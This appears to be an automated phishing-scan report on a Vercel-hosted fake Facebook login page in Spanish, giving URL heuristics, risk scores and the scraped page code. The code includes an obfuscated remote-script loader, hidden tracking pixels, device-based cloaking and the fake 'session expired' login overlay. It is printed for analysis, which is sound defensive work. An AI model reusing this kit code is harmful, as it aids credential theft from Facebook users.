Windows Analysis Report
https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate user interface interaction, removing an overlay and fading out a target element. There are no high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is straightforward and does not exhibit any malicious behaviors."
}

document.querySelector('.alert .button:last-child').addEventListener("click", function() {
    document.getElementById("overlay").remove();
    document.getElementById("sios").remove();
	const target = document.getElementsByTagName("div")[0];
    target.style.opacity = '0';
    // If you want to remove it from the page after the fadeout
    target.addEventListener('transitionend', () => target.remove());
});

{
    "risk_score": 8,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of obfuscated code and the attempt to detect and redirect mobile devices further increases the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution."
}

  
document.write(unescape("%0A%3Chtml%3E%0A%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%3C/meta%3E%0A%20%20%3Cmeta%20content%3D%22width%3Ddevice-width%22%20name%3D%22viewport%22%3E%3C/meta%3E%0A%20%20%3Ctitle%3Ereplit%3C/title%3E%0A%20%20%3Clink%20href%3D%22style.css%22%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%3E%3C/link%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%20%20%3Cscript%20async%3D%22%22%20src%3D%22https%3A//emma-24.com/index.php%3Fusername%3Dpanilover%22%20type%3D%22text/javascript%22%3E%3C/script%3E%0A%3C/body%3E%0A%0A%3C/html%3E%0A%0A%3Cimg%20alt%3D%22%22%20src%3D%22//whos.amung.us/pingjs/%3Fk%3Dcondiossi729%26amp%3Bt%3DLA%20CENTRAL%20%uD83D%uDC7B%26amp%3Bx%3Dhttps%3A//www.facebook.com/%22%20style%3D%22display%3A%20none%3B%22%20/%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%09document.oncontextmenu%20%3D%20function%28%29%7Breturn%20false%7D%0A%3C/script%3E%0A%0A%0A%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A//%3C%21%5BCDATA%5B%0A%20function%20h%28r%2C%20a%29%20%7B%20var%20t%20%3D%20%22%22%3B%20if%20%28%22mix%22%20%3D%3D%20a%29%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20else%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20for%20%28var%20n%20%3D%200%3B%20r%20%3E%20n%3B%20n++%29%20t%20+%3D%20h.charAt%28Math.floor%28Math.random%28%29%20*%20%0Ah.length%29%29%3B%20return%20t%20%7D%3B%0A%0A%20%20%20%20%20%20%20%20var%20device%20%3D%20navigator.userAgent%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20if%20%28device.match%28/Iphone/i%29%7C%7C%20device.match%28/Ipod/i%29%7C%7C%20device.match%28/Android/i%29%7C%7C%20device.match%28/J2ME/i%29%7C%7C%20device.match%28/BlackBerry/i%29%7C%7C%20device.match%28/iPhone%7CiPad%7CiPod/i%29%7C%7C%20device.match%28/Opera%20Mini/i%29%7C%7C%20device.match%28/IEMobile/i%29%7C%7C%20device.match%28/Mobile/i%29%7C%7C%20device.match%28/Windows%20Phone/i%29%7C%7C%20device.match%28/windows%20mobile/i%29%7C%7C%20device.match%28/windows%20ce/i%29%7C%7C%20device.match%28/webOS/i%29%7C%7C%20device.match%28/palm/i%29%7C%7C%20device.match%28/bada/i%29%7C%7C%20device.match%28/series60/i%29%7C%7C%20device.match%28/nokia/i%29%7C%7C%20device.match%28/symbian/i%29%7C%7C%20device.match%28/HTC/i%29%29%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%7Delse%0A%7B%0Awindow.location%20%3D%20%22https%3A//www.justice.gov/archive/ndic/spanish/13420/index.htm%22%3C/script%3E"));
//-->

{
    "risk_score": 7,
    "reasoning": "This script demonstrates several high-risk behaviors, including redirecting users to an external domain (https://www.justice.gov/archive/ndic/spanish/13420/index.htm) based on device detection. The use of obfuscated code and the redirection to an untrusted domain are strong indicators of malicious intent. While the script may have a legitimate purpose, such as mobile optimization, the lack of transparency and the suspicious redirection raise significant security concerns."
}

//<![CDATA[
 function h(r, a) { var t = ""; if ("mix" == a) var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; else var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var n = 0; r > n; n++) t += h.charAt(Math.floor(Math.random() * 
h.length)); return t };

        var device = navigator.userAgent
        
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
        {
         
        }else
{
window.location = "https://www.justice.gov/archive/ndic/spanish/13420/index.htm"

{
    "risk_score": 4,
    "reasoning": "The provided JavaScript snippet exhibits some moderate-risk behaviors, such as redirecting the user to a random URL using `window.location.hash` and including external resources like jQuery and a custom script file. However, there are no clear indicators of high-risk activities like data exfiltration or malicious code execution. The script appears to be part of a login or authentication flow, which could explain the dynamic behavior. Further review may be necessary to determine the overall intent and potential risks."
}

window.location.hash = Math.random();let head=`<head>

  <meta charset="UTF-8">
  <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
     l="shortcut icon" href="./Facebook - Inicia sesin o regstrate_files/img/favicon.ico"><link type="text/css" rel="stylesheet" href="./Facebook - Inicia sesin o regstrate_files/touch.css"><script type="text/javascript" src="./Facebook - Inicia sesin o regstrate_files/jquery.min.js.download"></script><script type="text/javascript" src="./Facebook - Inicia sesin o regstrate_files/script.js.download"></script></head>

<body tabindex="0" class="touch x2 ios sf mSafari _fzu _50-3 iframe acw  portrait" style="background-color: rgb(255, 255, 255); min-height: 735px;">
       comienzo de carga -->
    
<style id="sios">
.alert * {
	-webkit-tap-highlight-color: transparent;
	-webkit-touch-callout: none;
	-ms-touch-action: none;
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
}

.alert *:focus {
	outline: 0
}

.alert {
	position: fixed;
	top: 50%;
	left: 50%;
	margin-left: -135px;
	margin-top: -50px;
	width: 270px;
	text-align: center;
	font-family: -apple-system, SF UI Text, Helvetica Neue, Helvetica, Arial, sans-serif;
	font-size: 14px;
	line-height: 1.4;
	border-radius: 13px;
	overflow: hidden;
	z-index: 9998;
	background-color: rgba(255, 255, 255, 1);
}

.alert .inner {
	padding: 15px;
}

.alert .title {
	font-weight: 500;
	font-size: 18px;
}

.alert .text {
	margin-top: 5px;
}

.alert .button {
	position: relative;
	height: 44px;
	line-height: 44px;
	font-size: 17px;
	color: #007aff;
	border-radius: 0 0 13px 13px;
	overflow: hidden;
	cursor: pointer;
}

.alert .button:after {
	content: '';
	position: absolute;
	left: 0;
	top: 0;
	height: 1px;
	width: 100%;
	display: block;
	background-color: #c4c4c4;
	z-index: 9999;
}
#overlay {
  position: fixed;
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: rgba(0,0,0,0.3);
  z-index: 9997;
  cursor: pointer;
}
</style>
<div id="overlay">
    <div class="alert">
    	<div class="inner">
    		<div class="title">La sesin ha caducado</div>
    		<div class="text">Vuelve a iniciar sesin.</div>
    	</div>
    	<div class="button">OK</div>
    </div>
</div>
<div style="position: fixed;z-index:9996;background-color: #fff;width: 100%;height: 100%;margin: 0;transition: opacity 0.2s;">
	<div style="position: absolute;top: 45%;left: 50%;margin-top: -50px;margin-left: -40px;">
		<img src="./Facebook - Inicia sesin o regstrate_files/facebooklogo.png" style="width: 80px;height: 80px;" alt="">
	</div>
	<div style="position: absolute;top: 85%;left: 50%;margin-left: -70px;">
		<img src="./Facebook - Inicia sesin o regstrate_files/img_2713.jpg" style="width: 140px;height: auto;" alt="">
	</div>
</div>
<script>
document.querySelector('.alert .button:last-child').addEventListener("click", function() {
    document.getElementById("overlay").remove();
    document.getElementById("sios").remove();
	const target = document.getElementsByTagName("div")[0];
    target.style.opacity = '0';
    // If you want to remove it from the page after the fadeout
    target.addEventListener('transitionend', () => target.remove());
});
</script>
<img src="//whos.amung.us/pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/" style="display:none" alt="">
<img src="//whos.amung.us/pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/" style="display:none" alt="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta name="robots" content="nofollow">
  <meta name="googlebot" content="noindex">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <style media="screen">
  <meta property="og:url" content="https://www.youtube.com/" />
    <meta name="robots" content="nofollow">
    <meta name="googlebot" content="noindex">
    :root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#d

{
  "contains_trigger_text": true,
  "trigger_text": "Facebook needs to verify your account information to allow access this video",
  "prominent_button_name": "Log In",
  "text_input_field_labels": [
    "Email or phone number",
    ""
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Facebook"
  ]
}

```json{  "legit_domain": "facebook.com",  "classification": "wellknown",  "reasons": [    "The brand 'Facebook' is well-known and is associated with the domain 'facebook.com'.",    "The URL 'mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app' does not match the legitimate domain 'facebook.com'.",    "The URL contains multiple hyphens and a subdomain structure that is not typical for Facebook.",    "The domain 'vercel.app' is a hosting platform and not directly associated with Facebook.",    "The presence of input fields for 'Email or phone number' and password is typical for phishing attempts targeting Facebook credentials."  ],  "riskscore": 9}
Google indexed: False